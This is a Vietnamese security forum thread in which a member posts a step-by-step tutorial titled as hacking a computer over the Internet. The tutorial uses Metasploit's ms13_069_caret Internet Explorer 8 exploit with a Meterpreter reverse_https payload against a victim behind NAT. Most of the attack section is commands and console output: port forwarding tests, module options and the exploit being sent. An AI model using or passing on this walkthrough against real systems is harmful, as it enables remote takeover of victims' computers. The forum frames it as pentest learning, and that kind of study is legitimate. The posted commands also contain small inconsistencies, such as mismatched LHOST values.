Hướng dẫn hacking một máy tính thông qua Internet

Thảo luận trong 'Audit/Pentest Security' bắt đầu bởi Hackerstudent93, 03/12/15, 10:12 PM.

  1. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Hi all,

    Hôm nay mình đã trờ lại, và trong bài viết nhở này chúng ta sẽ xem xét làm thế nào để cấu hình một cách chính xác Meterpreter Payload và làm chúng hoạt động khi tấn công của bạn là phía sau NAT. Thậm chí nếu cả 2 mục tiêu là: hacker và nạn nhân đều phía sau NAT. Có lẽ tôi sẽ khai thác một trình duyệt để chứng minh điều này.

    Mô hình:

    [​IMG]



    Như các bạn có thể nhìn thấy. Cả hacker và nạn nhân là phía sau NAT, làm thế nào để đột nhập vào máy này bây giờ ???
     
    Last edited by a moderator: 03/12/15, 10:12 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Hello everyone :)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. sunny

    sunny VIP Members

    Tham gia: 30/06/14, 10:06 PM
    Bài viết: 1,834
    Đã được thích: 860
    Điểm thành tích:
    113
    Bài hay, thanks
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. duc_2712

    duc_2712 W-------

    Tham gia: 22/04/14, 06:04 AM
    Bài viết: 19
    Đã được thích: 2
    Điểm thành tích:
    18
    Tiếp nữa đi bác. giả dụ trong trường hợp dùng win xp, win 7, win 8, win 8.1 và win 10 thì cách thức tấn công như thế nào bác. em đã làm đồ án trên win xp và win 7 đã thành công nhờ hướng dẫn của bác
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Tiếp theo:
    Chúng ta sẽ giả định rằng đối phương có khả khả năng kết nối đến Internet qua Port 80 và 443
    Tôi sẽ sử dụng Kali Linux như những kẻ tấn công, Metasploit thì đã có sẵn trên kali linux. Vui lòng chắc rằng bạn đã cập nhật Metasploit phiên bản mới nhất trên Kali Linux.
    Tôi sẽ khác thác trình duyệt Inetnet Explorer 8 vì nó đã lỗi thời và chứa rất nhiều lỗ hỏng bảo mật dễ bị tấn công :)
    Ý tưởng là để cấu hình Router/Firewall để traffic tới các IP Public (1.1.1.1) của Router sẽ được forward đến IP Hacker (192.168.0.187) trên các cổng 80 và 443. Vui lòng chắc chắn để kiểm tra xem cổng 80 và 443 không được sử dụng bởi Router/Firewall.

    Đầu tiên chúng ta cần xác minh rằng forwarding đang làm việc.
    Trên Kali tạo một tập tin hmtl nhở và lưu nó dưới /tmp
    Mã:
    root@kali:~# cd /tmp
    root@kali:/tmp# echo "It works" > test.html
    
    Từ thư mục chứa các file test.html chạy lệnh python này.

    Mã:
    root@kali:/tmp# python -m SimpleHTTPServer 443
    Serving HTTP on 0.0.0.0 port 443 ...
    192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /test.html HTTP/1.1" 200 -
    192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
    192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -
    192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
    192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -
    
    
    Nếu bây giờ bạn kết nối đến http://192.168.1.26:443/test.html bạn sẽ thấy:



    Bây giờ. Trên một máy tính bất kỳ ngoài Inetnet gõ http://1.1.1.1/test.html ( thay IP 1.1.1.1 bằng IP Public của bạn ) nếu bạn nhìn thấy trang này chứng tở forwarding đã được cấu hình chính xác và đang làm việc tốt. nếu không bạn cần kiểm tra lại cấu hình forwarding . Hướng dẫn cấu hình nằm ngoài phạm vi bài viết tôi để cho các bạn tự tìm hiểu ;)

    Lưu ý: forwarding thì đang làm việc chính xác cho cả 2 cổng 80 và 443. test thêm điều này.

    Mã:
    root@kali:~# cd /tmp
    root@kali:/tmp# python -m SimpleHTTPServer 80
    Serving HTTP on 0.0.0.0 port 80 ...
    192.168.1.26 - - [04/Dec/2015 11:01:15] "GET /test.html HTTP/1.1" 200 -
    
    
    Metasploit Configruration

    Tôi sẽ sử dụng ms13_069_caret.rb để khai thác.

    Mã:
    msf > use exploit/windows/browser/ms13_069_caret
    msf exploit(ms13_069_caret) > show options
    
    Module options (exploit/windows/browser/ms13_069_caret):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT  8080             yes       The local port to listen on.
       SSL      false            no        Negotiate SSL for incoming connections
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                   no        The URI to use for this exploit (default is random)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   IE 8 on Windows XP SP3
    
    
    msf exploit(ms13_069_caret) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(ms13_069_caret) > set URIPATH /
    URIPATH => /
    msf exploit(ms13_069_caret) >
    
    Kế tiếp chúng ta sẽ lựa chọn meterpreter reverse_https payload for windows. Chạy show options một lần nữa và chúng ta sẽ nhìn thấy điều này.

    Mã:
    msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https
    payload => windows/meterpreter/reverse_https
    msf exploit(ms13_069_caret) > show options
    
    Module options (exploit/windows/browser/ms13_069_caret):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT  80               yes       The local port to listen on.
       SSL      false            no        Negotiate SSL for incoming connections
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH  /                no        The URI to use for this exploit (default is random)
    
    
    Payload options (windows/meterpreter/reverse_https):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: ', seh, thread, process, none)
       LHOST                      yes       The local listener hostname
       LPORT     8443             yes       The local listener port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   IE 8 on Windows XP SP3
    
    
    msf exploit(ms13_069_caret) >
    
    msf exploit(ms13_069_caret) > set LPORT 443
    LPORT => 443
    msf exploit(ms13_069_caret) > set LHOST 1.55.109.2. ( YOUR IP PUBLIC)
    LHOST => 1.1.1.1
    Mã:
    
    Chúng ta có thể nói cho nó biết để lắng nghe trên IP LAN
    
    [CODE]
    msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.1.26
    ReverseListenerBindAddress => 192.168.1.26
    
    
    Mã:
    msf exploit(ms13_069_caret) > exploit
    [*]Exploit running as background job.
    [*]Started HTTPS reverse handler on https://192.168.1.26:443/
    [*]Using URL: http://0.0.0.0:80/
    [*]Local IP: http://192.168.1.26:80/
    [*]Server started.
    msf exploit(ms13_069_caret) >
    
    Nếu bây giờ chúng ta sử dụng IE 8 trên máy nạn nhân và kết nối với IP Public của Hacker. Chúng ta sẽ thấy điều này.

    Mã:
    msf exploit(ms13_069_caret) >
    [*]2.2.2.2   ms13_069_caret - Sending exploit...
    [*]2.2.2.2   ms13_069_caret - Sending exploit...
    [*]2.2.2.2:53893 Request received for /NtFT...
    [*]2.2.2.2:53893 Staging connection for target /NtFT received...
    [*]Patched user-agent at offset 663128...
    [*]Patched transport at offset 662792...
    [*]Patched URL at offset 662856...
    [*]Patched Expiration Timeout at offset 663728...
    [*]Patched Communication Timeout at offset 663732...
    
    Note:

    SRVHOST : 0.0.0.0
    SRVPORT : set to the port where you want to host the browser exploit
    LHOST : the attacker public IP
    LPORT : set to the port where you want to serve the Meterpreter handler
    ReverseListenerBindAddress : LAN IP (optional)

    Screenshot from 2015-12-04 10:29:46.jpg
     

    Các file đính kèm:

    Last edited by a moderator: 28/05/20, 10:05 AM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Mệt rồi! Tạm thời tôi đi ngủ cái đã. mai rảnh sẽ xem lại có bị hoat mắt gõ sai chỗ nào không ;)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Bạn có thể tham khảo bài viết của mình ở trên nhé. Nhưng bạn đã làm đồ án thành công trên win xp và win 7 nhờ hướng dẫn của mình. Mình đang tò mò là không biết bài nào nhỉ ? trên diễn đàn có rất nhiều bài của mình ;)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. vequeemnhe

    vequeemnhe Wh------

    Tham gia: 29/06/15, 08:06 PM
    Bài viết: 62
    Đã được thích: 20
    Điểm thành tích:
    18
    Bài này good Thanks...........................
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. 4fingers

    4fingers W-------

    Tham gia: 23/11/15, 01:11 PM
    Bài viết: 13
    Đã được thích: 8
    Điểm thành tích:
    8
    cần lắm một bài hướng dẫn chất lượng :)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. duc_2712

    duc_2712 W-------

    Tham gia: 22/04/14, 06:04 AM
    Bài viết: 19
    Đã được thích: 2
    Điểm thành tích:
    18

    Bài này bác ơi
    https://whitehat.vn/forum/thao-luan...ong-dan-hack-win-7-loi-ms11-46-voi-metasploit
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  11. tieulyit

    tieulyit W-------

    Tham gia: 10/12/15, 02:12 PM
    Bài viết: 5
    Đã được thích: 0
    Điểm thành tích:
    1
    Sao mình k thấy link hay bài hướng dẫn gì hết mà bạn.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Bài hướng dẫn của mình ở trên rồi mà. Bạn muốn hỏi link hay bài hướng dẫn nào mới được ? :)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  13. luongtankhang123

    luongtankhang123 W-------

    Tham gia: 02/07/13, 09:07 PM
    Bài viết: 47
    Đã được thích: 14
    Điểm thành tích:
    18
    Điều kiện hoàn hảo tuyệt đối: IE
    Imposible :D
    Bài viết hay, thanks bác :D
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan